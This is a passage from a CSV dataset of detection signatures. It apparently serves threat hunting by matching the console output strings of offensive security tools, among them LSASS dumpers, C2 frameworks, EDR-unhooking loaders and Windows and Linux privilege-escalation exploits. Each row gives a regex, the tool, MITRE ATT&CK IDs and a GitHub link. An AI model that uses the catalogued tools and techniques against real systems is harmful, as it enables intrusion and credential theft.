TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*[+] Generated XOR key: *",".{0,1000}\[\+\]\sGenerated\sXOR\skey\:\s.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*[+] Generating base64 encoded PowerShell script*",".{0,1000}\[\+\]\sGenerating\sbase64\sencoded\sPowerShell\sscript.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*[+] GetPEFromRemoteServer*",".{0,1000}\[\+\]\sGetPEFromRemoteServer.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*[+] Getting credentials using U2U*",".{0,1000}\[\+\]\sGetting\scredentials\susing\sU2U.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] Got Krb Auth from NT/System. 
Relaying to ADCS now*",".{0,1000}\[\+\]\sGot\sKrb\sAuth\sfrom\sNT\/System\.\sRelaying\sto\sADCS\snow.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now*",".{0,1000}\[\+\]\sGot\sKrb\sAuth\sfrom\sNT\/SYSTEM\.\sRelying\sto\sLDAP\snow.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] Got NTLM type 3 AUTH message from * with hostname *",".{0,1000}\[\+\]\sGot\sNTLM\stype\s3\sAUTH\smessage\sfrom\s.{0,1000}\s\swith\shostname\s.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*[+] hacked the exterior layer of the datacenter mainframe*",".{0,1000}\[\+\]\shacked\sthe\sexterior\slayer\sof\sthe\sdatacenter\smainframe.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*[+] Hello from DllMain-PROCESS_ATTACH in 
Merlin*",".{0,1000}\[\+\]\sHello\sfrom\sDllMain\-PROCESS_ATTACH\sin\sMerlin.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*[+] Hijackable DLL: *",".{0,1000}\[\+\]\sHijackable\sDLL\:\s.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*[+] HiveDump Loaded*",".{0,1000}\[\+\]\sHiveDump\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] HTTP Client Auth Context swapped with SYSTEM *",".{0,1000}\[\+\]\sHTTP\sClient\sAuth\sContext\sswapped\swith\sSYSTEM\s.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*[+] HTTP reflected DCOM authentication succeeded!*",".{0,1000}\[\+\]\sHTTP\sreflected\sDCOM\sauthentication\ssucceeded!.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*[+] ICMP listener started!*",".{0,1000}\[\+\]\sICMP\slistener\sstarted!.{0,1000}","offensive_tool_keyword","PingRAT","secretly passes Command and Control (C2) traffic through firewalls using ICMP payloads","T1071.004 - T1573.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/umutcamliyurt/PingRAT","1","0","N/A","10","10","82","12","2023-09-29T22:26:15Z","2023-09-29T22:07:46Z" "*[+] ICYGUIDER'S CUSTOM SYSCALL SHELLCODE LOADER*",".{0,1000}\[\+\]\sICYGUIDER\'S\sCUSTOM\sSYSCALL\sSHELLCODE\sLOADER.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*[+] Impersonating user * to target SPN *",".{0,1000}\[\+\]\sImpersonating\suser\s.{0,1000}\sto\starget\sSPN\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default 
settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] Injected the * DLL into process *",".{0,1000}\[\+\]\sInjected\sthe\s.{0,1000}\sDLL\sinto\sprocess\s.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*[+] Injecting dropper.vba into *",".{0,1000}\[\+\]\sInjecting\sdropper\.vba\sinto\s.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*[+] Injecting into existing process*",".{0,1000}\[\+\]\sInjecting\sinto\sexisting\sprocess.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. 
This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*[+] Injecting into existing process*",".{0,1000}\[\+\]\sInjecting\sinto\sexisting\sprocess.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*[+] Injecting into existing process*",".{0,1000}\[\+\]\sInjecting\sinto\sexisting\sprocess.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] Invoking EfsRpcAddUsersToFile with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcAddUsersToFile\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Invoking EfsRpcAddUsersToFileEx with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcAddUsersToFileEx\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate 
privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Invoking EfsRpcDecryptFileSrv with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcDecryptFileSrv\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Invoking EfsRpcDuplicateEncryptionInfoFile with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcDuplicateEncryptionInfoFile\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Invoking EfsRpcDuplicateEncryptionInfoFile with target path:*",".{0,1000}\[\+\]\sInvoking\sEfsRpcDuplicateEncryptionInfoFile\swith\starget\spath\:.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Invoking EfsRpcEncryptFileSrv with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcEncryptFileSrv\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Invoking EfsRpcFileKeyInfo with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcFileKeyInfo\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Invoking EfsRpcFileKeyInfoEx with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcFileKeyInfoEx\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Invoking EfsRpcGetEncryptedFileMetadata with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcGetEncryptedFileMetadata\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Invoking EfsRpcOpenFileRaw with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcOpenFileRaw\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Invoking 
EfsRpcQueryRecoveryAgents with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcQueryRecoveryAgents\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Invoking EfsRpcQueryUsersOnFile with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcQueryUsersOnFile\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Invoking EfsRpcRemoveUsersFromFile with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcRemoveUsersFromFile\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Invoking EfsRpcSetEncryptedFileMetadata with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcSetEncryptedFileMetadata\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] Keylogger started with PID *",".{0,1000}\[\+\]\sKeylogger\sstarted\swith\sPID\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a 
post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] Keylogger started*",".{0,1000}\[\+\]\sKeylogger\sstarted.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*[+] Keylogger stopped*",".{0,1000}\[\+\]\sKeylogger\sstopped.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*[+] keystrokes dump from agent*",".{0,1000}\[\+\]\skeystrokes\sdump\sfrom\sagent.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*[+] Loading BetterXencrypt and doing some encryption with random iterations*",".{0,1000}\[\+\]\sLoading\sBetterXencrypt\sand\sdoing\ssome\sencryption\swith\srandom\siterations.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*[+] Loading 
PSObfuscation and randomizing script*",".{0,1000}\[\+\]\sLoading\sPSObfuscation\sand\srandomizing\sscript.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*[+] Loading PyFuscation and doing $some obfuscation*",".{0,1000}\[\+\]\sLoading\sPyFuscation\sand\sdoing\s\$some\sobfuscation.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*[+] LSASS dump done!*",".{0,1000}\[\+\]\sLSASS\sdump\sdone!.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*[+] LSASS Dump Read: *",".{0,1000}\[\+\]\sLSASS\sDump\sRead\:\s.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*[+] Malicious named pipe running on *",".{0,1000}\[\+\]\sMalicious\snamed\spipe\srunning\son\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*[+] MIND YOUR OPSEC! 
Serving Pyramid files from folder *",".{0,1000}\[\+\]\sMIND\sYOUR\sOPSEC!\sServing\sPyramid\sfiles\sfrom\sfolder\s.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*[+] Minidump successfully saved to memory*",".{0,1000}\[\+\]\sMinidump\ssuccessfully\ssaved\sto\smemory.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*[+] My personal simple and stupid Token Stealer... *",".{0,1000}\[\+\]\sMy\spersonal\ssimple\sand\sstupid\s\sToken\sStealer\.\.\.\s.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","#program content","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*[+] New incoming shell from : *",".{0,1000}\[\+\]\sNew\sincoming\sshell\sfrom\s\:\s.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*[+] No insecure resource delegations found. 
Eureka!*",".{0,1000}\[\+\]\sNo\sinsecure\sresource\sdelegations\sfound\.\sEureka!.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*[+] No insecure trustee delegations found. Eureka!*",".{0,1000}\[\+\]\sNo\sinsecure\strustee\sdelegations\sfound\.\sEureka!.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*[+] NtAllocateVirtualMemory Not Hooked*",".{0,1000}\[\+\]\sNtAllocateVirtualMemory\sNot\sHooked.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*[+] NTDLL unhooking enabled*",".{0,1000}\[\+\]\sNTDLL\sunhooking\senabled.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. 
This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*[+] NTDLL unhooking enabled*",".{0,1000}\[\+\]\sNTDLL\sunhooking\senabled.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*[+] NtProtectVirtualMemory Not Hooked*",".{0,1000}\[\+\]\sNtProtectVirtualMemory\sNot\sHooked.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*[+] NtWaitForSingleObject Not Hooked*",".{0,1000}\[\+\]\sNtWaitForSingleObject\sNot\sHooked.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*[+] Nuke is landing.*",".{0,1000}\[\+\]\sNuke\sis\slanding\..{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral 
Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*[+] Obtained ADSync service account token from miiserver process*",".{0,1000}\[\+\]\sObtained\sADSync\sservice\saccount\stoken\sfrom\smiiserver\sprocess.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","0","content","10","1","33","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z" "*[+] Opened Process Token Sucessufully!*",".{0,1000}\[\+\]\sOpened\sProcess\sToken\sSucessufully!.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","93","13","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*[+] overwriting modprobe_path with different PIDs *",".{0,1000}\[\+\]\soverwriting\smodprobe_path\swith\sdifferent\sPIDs\s.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*[+] Parsed Procmon output for potential DLL hijack paths!*",".{0,1000}\[\+\]\sParsed\sProcmon\soutput\sfor\spotential\sDLL\shijack\spaths!.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - 
T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","0","N/A","9","4","321","58","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z" "*[+] Payload DLL successfully loaded after*",".{0,1000}\[\+\]\sPayload\sDLL\ssuccessfully\sloaded\safter.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*[+] Payload format: pwsh*",".{0,1000}\[\+\]\sPayload\sformat\:\spwsh.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral 